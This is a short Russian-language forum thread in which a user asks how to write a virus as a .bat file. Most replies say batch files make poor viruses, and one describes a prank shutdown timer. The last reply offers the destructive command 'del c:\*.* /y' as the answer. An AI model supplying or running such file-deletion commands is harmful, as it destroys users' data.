Елена Лаврова

как создать вирус вернее коды для формата .bat

Юр
Юрий

Вирусы в формате bat не пишут.
Вирусы на ЯП пишут.

-=Den=-
Это не вирус а просто прикол.
Причитайте какими свойствами должен обладать вирус. http://ru.wikipedia.org/wiki/Компьютерны...
С помощью bat этого не добиться. Нужен нормальный язык программирования.

Ин
Инкогнито

Саша Коньков, как сказать... Можно и в батнике написать вирусяку... Я писал, правда безобидные 🙂 Один из таких: человек включает комп, запускается таймер после загрузки и комп выключается через определенное время.

Де
Денис

del c:\*.* /y